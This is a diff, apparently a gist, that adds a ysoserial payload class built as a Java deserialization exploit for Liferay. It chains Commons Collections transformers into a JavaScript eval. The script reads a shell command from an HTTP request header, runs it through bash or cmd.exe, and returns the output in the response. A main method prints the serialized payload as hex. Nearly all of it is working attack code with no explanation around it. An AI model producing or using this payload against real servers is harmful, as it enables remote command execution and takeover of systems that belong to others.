testanull · March 27, 2020 09:18 · Mar 27, 2020
diff --git a/LiferayJsonEvalCC6.java b/LiferayJsonEvalCC6.java
@@ -0,0 +1,121 @@
+package ysoserial.payloads;
+
+import com.mchange.lang.ByteUtils;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.PayloadRunner;
+
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.PrintStream;
+import java.io.Serializable;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+
+@Dependencies({"commons-collections:commons-collections:3.2.1"})
+@Authors({Authors.MATTHIASKAISER, Authors.JANG})
+public class LiferayJsonEvalCC6 extends PayloadRunner implements ObjectPayload<Serializable> {
+    public Serializable getObject(String command) throws Exception {
+        String dropper = "var currentThread = com.liferay.portal.service.ServiceContextThreadLocal.getServiceContext();\n" +
+            "var isWin = java.lang.System.getProperty(\"os.name\").toLowerCase().contains(\"win\");\n" +
+            "var request = currentThread.getRequest();\n" +
+            "var _req = org.apache.catalina.connector.RequestFacade.class.getDeclaredField(\"request\");\n" +
+            "_req.setAccessible(true);\n" +
+            "var realRequest = _req.get(request);\n" +
+            "var response = realRequest.getResponse();\n" +
+            "var outputStream = response.getOutputStream();\n" +
+            "var cmd = new java.lang.String(request.getHeader(\"" + command + "\"));\n" +
+            "var listCmd = new java.util.ArrayList();\n" +
+            "var p = new java.lang.ProcessBuilder();\n" +
+            "if(isWin){\n" +
+            "    p.command(\"cmd.exe\", \"/c\", cmd);\n" +
+            "}else{\n" +
+            "    p.command(\"bash\", \"-c\", cmd);\n" +
+            "}\n" +
+            "p.redirectErrorStream(true);\n" +
+            "var process = p.start();\n" +
+            "var inputStreamReader = new java.io.InputStreamReader(process.getInputStream());\n" +
+            "var bufferedReader = new java.io.BufferedReader(inputStreamReader);\n" +
+            "var line = \"\";\n" +
+            "var fullText = \"\";\n" +
+            "while((line = bufferedReader.readLine()) != null){\n" +
+            "    fullText = fullText + line + \"\\n\";\n" +
+            "}\n" +
+            "var bytes = fullText.getBytes(\"UTF-8\");\n" +
+            "outputStream.write(bytes);\n" +
+            "outputStream.close();\n";
+        String[] execArgs = new String[]{dropper};
+        Transformer[] transformers = new Transformer[]{new ConstantTransformer(javax.script.ScriptEngineManager.class),
+            new InvokerTransformer("newInstance", new Class[]{},
+                new Object[]{}),
+            new InvokerTransformer("getEngineByName", new Class[]{String.class},
+                new Object[]{"JavaScript"}),
+            new InvokerTransformer("eval", new Class[]{String.class}, execArgs), new ConstantTransformer(1)};
+        Transformer transformerChain = new ChainedTransformer(transformers);
+        Map innerMap = new HashMap();
+        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
+        HashSet map = new HashSet(1);
+        map.add("foo");
+        Field f = null;
+
+        try {
+            f = HashSet.class.getDeclaredField("map");
+        } catch (NoSuchFieldException var18) {
+            f = HashSet.class.getDeclaredField("backingMap");
+        }
+
+        f.setAccessible(true);
+        HashMap innimpl = (HashMap) f.get(map);
+        Field f2 = null;
+
+        try {
+            f2 = HashMap.class.getDeclaredField("table");
+        } catch (NoSuchFieldException var17) {
+            f2 = HashMap.class.getDeclaredField("elementData");
+        }
+
+        f2.setAccessible(true);
+        Object[] array = (Object[]) ((Object[]) f2.get(innimpl));
+        Object node = array[0];
+        if (node == null) {
+            node = array[1];
+        }
+
+        Field keyField = null;
+
+        try {
+            keyField = node.getClass().getDeclaredField("key");
+        } catch (Exception var16) {
+            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
+        }
+
+        keyField.setAccessible(true);
+        keyField.set(node, entry);
+        return map;
+    }
+
+    public static void main(String[] args) throws Exception {
+        PrintStream out = System.out;
+        LiferayJsonEvalCC6 cc6Eval = new LiferayJsonEvalCC6();
+        ObjectPayload payload = LiferayJsonEvalCC6.class.newInstance();
+        Object object = cc6Eval.getObject("cmd2");
+        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+        ObjectOutputStream objOut = new ObjectOutputStream(byteArrayOutputStream);
+        objOut.writeObject(object);
+
+        String hexDmp = ByteUtils.toHexAscii(byteArrayOutputStream.toByteArray());
+        System.out.println(hexDmp);
+
+        ObjectPayload.Utils.releasePayload(payload, object);
+//        PayloadRunner.run(LiferayJsonEvalCC6.class, args);
+    }
+}